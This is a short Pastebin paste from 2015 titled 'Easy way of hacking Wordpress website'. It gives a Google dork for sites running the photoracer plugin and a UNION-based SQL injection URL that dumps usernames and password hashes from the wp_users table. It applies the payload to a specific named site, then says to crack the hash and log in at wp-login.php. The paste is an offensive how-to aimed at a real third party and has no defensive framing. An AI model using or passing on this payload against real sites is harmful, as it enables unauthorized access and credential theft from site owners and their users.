Kyfx

Easy way of hacking Wordpress website

Jul 18th, 2015
427
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.67 KB | None | 0 0
  1. inurl:"wp-content/plugins/photoracer/viewimg.php?id="
  2.  
  3. and i'm gonna test 1 of them for ex this find in google
  4.  
  5.  
  6. http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2
  7.  
  8.  
  9. we are going to add the exploit : this is the exploit
  10.  
  11.  
  12. /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
  13.  
  14.  
  15. and the site look like this
  16.  
  17.  
  18. http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
  19.  
  20.  
  21. now you can see the user and pass :D ! Just crack the hash and it's done
  22. The admin panel is
  23. http://Site/wp-login.php
Add Comment
Please, Sign In to add comment